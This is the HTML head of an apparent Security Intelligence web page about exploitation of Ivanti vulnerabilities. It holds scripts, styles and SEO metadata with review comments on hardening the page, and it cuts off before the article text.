Widespread exploitation of recently disclosed Ivanti vulnerabilities
<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="shortcut icon" type="image/x-icon" href="https://securityintelligence.com/wp-content/themes/sapphire/images/favicon.ico" sizes="32x32" /> <!-- A11Y(review): maximum-scale=1 disables pinch zoom (WCAG 1.4.4 failure); width=device-width,initial-scale=1 is sufficient. --> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1"> <!-- DEFINITIONS --> <title>Widespread exploitation of recently disclosed Ivanti vulnerabilities</title> <!--<meta name="description" content="">--> <!-- THEME COLOR --> <meta name="theme-color" content="#000000"> <!-- SECURITY(review): no-referrer-when-downgrade sends the full page URL, query string included, as the Referer to every third-party origin this head loads (s81c.com, cdn.ampproject.org, unpkg.com, fonts.googleapis.com). strict-origin-when-cross-origin sends only the origin cross-site and is the current browser default; prefer it unless a downstream consumer needs the full path. --> <!-- REFERRER POLICY --> <meta name="referrer" content="no-referrer-when-downgrade"> <script src="https://1.www.s81c.com/common/stats/ibm-common.js" type="text/javascript" async="async"></script> <!-- LANGUAGE/TRANSLATIONS --> <!-- NOTE(review): the AMP runtime below is loaded next to jQuery, inline analytics scripts and inline on* handlers elsewhere in this document, so this is not a valid AMP page; AMP CDN scripts cannot carry SRI and are trusted purely via the CDN origin. --> <!-- AMP SCRIPTS --> <script async src="https://cdn.ampproject.org/v0.js"></script> <script async custom-element="amp-list" src="https://cdn.ampproject.org/v0/amp-list-0.1.js"></script> <script async custom-template="amp-mustache" src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js"></script> <script async custom-element="amp-accordion" src="https://cdn.ampproject.org/v0/amp-accordion-0.1.js"></script> <script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script> <script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script> <script async custom-element="amp-bind" src="https://cdn.ampproject.org/v0/amp-bind-0.1.js"></script> <script async custom-element="amp-autocomplete" src="https://cdn.ampproject.org/v0/amp-autocomplete-0.1.js"></script> <script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.35.0/card-section-simple.min.js"></script> <script type="module" 
src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/card.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/image.min.js"></script> <script async custom-element="amp-lightbox-gallery" src="https://cdn.ampproject.org/v0/amp-lightbox-gallery-0.1.js"></script> <!-- SECURITY(review): supply-chain exposure. This script is fetched from unpkg.com with no version and no SRI, so whatever the package publishes next runs here as first-party code; the same applies to the carbon bundles above that are loaded from the mutable tag/v1/latest and tag/v1/next paths (and card-section-simple is loaded three times, once pinned and twice unpinned). Pin an exact version in the URL and add integrity="sha384-…" crossorigin="anonymous", or self-host the file. --> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script> <script async custom-element="amp-youtube" src="https://cdn.ampproject.org/v0/amp-youtube-0.1.js"></script> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets-300x158.jpeg.webp" media="(max-width: 300px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets-630x330.jpeg.webp" media="(max-width: 1200px) and (min-width: 301px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets.jpeg.webp" media="(max-width: 2400px) and (min-width: 631px)"> <link rel="preload" as="image" 
href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Close-up-of-a-smartphone-in-a-male-hands.-The-concept-of-online-messaging-social-media-communication-browsing-the-internet-websites-reading-news.-Wireless-technologies-gadgets.jpeg.webp" media="(max-width: 2400px) and (min-width: 1201px)"> <!-- FONTS --> <!-- <link rel="preload" href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500|IBM+Plex+Sans:300,400,500&display=swap" rel="stylesheet"> --> <!-- ANALYTICS --> <script> // Digital Registry digitalData = { "page": { "category": { "primaryCategory": "Threat Intelligence" }, "pageInfo": { "language": "en-US", "country": "US", "version": "custom", "effectiveDate": "2024-02-23", "publishDate": "2024-02-23", "optimizely": { "enabled": "false", }, "ibm": { "contentDelivery": "WordPress", "contentProducer": "Hand coded", "owner": "", "siteID": "SECURITYINTELLIGENCE", "type": "Xforce", } } } } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js function sendClickTag(section, feature, destination) { console.log(section + " " + feature) var config = { type: 'ELEMENT', primaryCategory: section, // e_a1 - Element Category eventName: feature, // e_a2 - Element Name targetURL: destination, // e_a7 - Element Attribute: ibmEvTarget }; ibmStats.event(config); } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js // function sendClickConversion(feature, title) { // var config = { // type : 'pageclick', // primaryCategory : 'PAGE CLICK', // eventCategoryGroup : "TIMELINE - SECURITY INTELLIGENCE", // eventName : feature, // targetTitle : title // }; // ibmStats.event(config); // } // Custom Link Event // Add clicktag event on every link inside the element function tagAllLinks(element, section, feature) { var element = document.querySelectorAll(element); if (typeof(element) != 'undefined' && element != null) { for (var i = 0; i < element.length; i++) { var elements = 
element[i].querySelectorAll("a:not(.btn)"); for (var o = 0; o < elements.length; o++) { if (elements[o].getAttribute('listener') !== 'true') { var destination = elements[o].getAttribute('href'); elements[o].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag(section, feature, this.getAttribute('href')); this.setAttribute('listener', 'false'); } }, false); elements[o].setAttribute('listener', 'true'); } } } } } window.onload = function() { // Call to action click tag var ctaButton = document.querySelectorAll(".single__content a"); if (typeof(ctaButton) != 'undefined' && ctaButton != null && ctaButton.length !== 0) { for (var i = 0; i < ctaButton.length; i++) { ctaButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "CALL TO ACTION"); this.setAttribute('listener', 'false'); } }, false); ctaButton[i].setAttribute('listener', 'true'); } } // Read more click tag var readButton = document.querySelectorAll(".continue-reading button"); if (typeof(readButton) != 'undefined' && readButton != null && readButton.length !== 0) { for (var i = 0; i < readButton.length; i++) { readButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "READ-MORE"); this.setAttribute('listener', 'false'); } }, false); readButton[i].setAttribute('listener', 'true'); } } // LISTICLES tag - Arrows //left arrow var leftArrow = document.getElementById("prev"); if (typeof(leftArrow) != 'undefined' && leftArrow != null) { //for (var i = 0; i < leftArrow.length; i++) { leftArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && leftArrow.id == "prev") { sendClickTag("BODY", "LISTICLE-LEFT-ARROW"); this.setAttribute('listener', 'false'); } }, false); leftArrow.setAttribute('listener', 'true'); //} } //right arrow var rightArrow = document.getElementById("next"); if (typeof(rightArrow) != 
'undefined' && rightArrow != null) { //for (var i = 0; i < rightArrow.length; i++) { rightArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && rightArrow.id == "next") { sendClickTag("BODY", "LISTICLE-RIGHT-ARROW"); this.setAttribute('listener', 'false'); } }, false); rightArrow.setAttribute('listener', 'true'); //} } // LISTICLES tag - numbers var listicleTopButton = document.querySelectorAll(".listicle__pagination__numbers"); if (typeof(listicleTopButton) != 'undefined' && listicleTopButton != null && listicleTopButton.length !== 0) { for (var i = 0; i < listicleTopButton.length; i++) { var currentSlide = 1; listicleTopButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { currentSlide++; var total = i; // var clickedSlides=currentSlide/2; // console.log(clickedSlides.toFixed()); //I'm removing 2 because 2 arrows on the listicle are unclickable, but present on the DOM // clickableArrows = i-2; // clickableArrows = i-1; // I'm deviding by 2 because on each slide we have 2 arrows, so we were actually sendind the double of tags // clickableArrows= clickableArrows/2; // console.log(i); // clickableArrows.toFixed(); if (currentSlide <= total) { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-SLIDE" + currentSlide); this.setAttribute('listener', 'false'); } else { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-END"); this.setAttribute('listener', 'false'); } } }, false); listicleTopButton[i].setAttribute('listener', 'true'); } } // // Timeline box click tag // var boxButton = document.querySelectorAll(".timeline__content .box"); // if (typeof(boxButton) != 'undefined' && boxButton != null && boxButton.length !== 0) { // for (var i = 0; i < boxButton.length; i++) { // boxButton[i].addEventListener('click', function(){ // if (this.getAttribute('listener') === 'true') { // sendClickConversion("DETAILED VIEW", this.getAttribute('data-title')); // this.setAttribute('listener', 'false'); // } 
// }, false); // boxButton[i].setAttribute('listener', 'true'); // } // } }; </script> <!-- COREMETRICS --> <script defer src="https://1.www.s81c.com/common/stats/ida_stats.js" type="text/javascript"></script> <!-- AMP DEFAULT CSS --> <style amp-boilerplate> body { -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both; animation: -amp-start 8s steps(1, end) 0s 1 normal both } @-webkit-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-moz-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-ms-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-o-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } </style><noscript> <style amp-boilerplate> body { -webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none } </style> </noscript> <link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/modules.css?v=1715191630"> <!-- CUSTOM CSS --> <meta name='robots' content='max-image-preview:large' /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/securityintelligence.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! 
This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof 
URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://securityintelligence.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! 
This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 
100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) 
!important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: 
var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: 
var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='taxonomy-image-plugin-public-css' href='https://securityintelligence.com/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6' type='text/css' media='screen' /> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" 
src="https://securityintelligence.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/themes/sapphire/app/javascript/si-theme-cookie.js?ver=6.6.2" id="si-cookie-consent-js"></script> <link rel="https://api.w.org/" href="https://securityintelligence.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securityintelligence.com/wp-json/wp/v2/xforce/447108" /><!-- SECURITY(review): information disclosure. The EditURI link advertises xmlrpc.php (a well-known brute-force and pingback abuse surface) and the generator meta publishes the exact WordPress version, which is a direct input to scanner fingerprinting. If XML-RPC is not needed, disable it and remove the RSD link (remove_action('wp_head', 'rsd_link')); remove the generator tag (remove_action('wp_head', 'wp_generator')). The wp-json links are acceptable only if the REST API is intentionally public. --><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securityintelligence.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.6.2" /> <link rel='shortlink' href='https://securityintelligence.com/?p=447108' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fexploitation-of-exposed-ivanti-vulnerabilities%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fx-force%2Fexploitation-of-exposed-ivanti-vulnerabilities%2F&format=xml" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png" sizes="32x32" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <meta name="msapplication-TileImage" content="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <style amp-custom>@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans:200,300,400,500,600');@import url('https://fonts.googleapis.com/css?family=IBM+Plex+Sans+Condensed:300,400,500,600,700');@import 
url('https://fonts.googleapis.com/css2?family=IBM+Plex+Serif&display=swap')</style><!-- SECURITY(review): unpinned stylesheet from unpkg.com with no SRI. Third-party CSS from a mutable package can restyle the page and exfiltrate form input through attribute selectors and url() fetches; pin the version and add integrity/crossorigin, matching whatever is done for the swiper script in the head. --><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/single.css?v=1722279696"> <!-- YOAST SEO --> <!-- SECURITY(review): the banner below discloses the SEO plugin and its exact version to anyone fingerprinting the site; suppress it (the plugin provides a filter for this) and confirm that v13.1 is actually the installed, current release. --> <!-- This site is optimized with the Yoast SEO Premium plugin v13.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions."/> <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/> <link rel="canonical" href="https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Widespread exploitation of recently disclosed Ivanti vulnerabilities" /> <meta property="og:description" content="Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions." 
/> <meta property="og:url" content="https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/" /> <meta property="og:site_name" content="Security Intelligence" /> <meta property="article:tag" content="Application Security" /> <meta property="article:tag" content="Data Protection" /> <meta property="article:tag" content="Data Security" /> <meta property="article:tag" content="Incident Response (IR)" /> <meta property="article:tag" content="Known Vulnerabilities" /> <meta property="article:tag" content="security intelligence & analytics" /> <meta property="article:tag" content="threat hunting" /> <meta property="article:section" content="Threat Intelligence" /> <meta property="fb:app_id" content="3703311399714818" /> <meta property="og:image" content="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg" /> <meta property="og:image:secure_url" content="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="630" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Ivanti has several known vulnerabilities that are being widely exploited. Read the X-Force team's research and learn how they are working towards resolutions." 
/> <meta name="twitter:title" content="Widespread exploitation of recently disclosed Ivanti vulnerabilities" /> <meta name="twitter:image" content="https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://securityintelligence.com/#website","url":"https://securityintelligence.com/","name":"Security Intelligence","inLanguage":"en-US","description":"Analysis and Insight for Information Security Professionals","potentialAction":{"@type":"SearchAction","target":"https://securityintelligence.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/#primaryimage","inLanguage":"en-US","url":"https://securityintelligence.com/wp-content/uploads/2024/02/Lock-sign-4.jpeg","width":1200,"height":630,"caption":"Closeup on a blue circuit board with an orange padlock in the center"},{"@type":"WebPage","@id":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/#webpage","url":"https://securityintelligence.com/x-force/exploitation-of-exposed-ivanti-vulnerabilities/","name":"Widespread exploitation of recently disclosed Ivanti 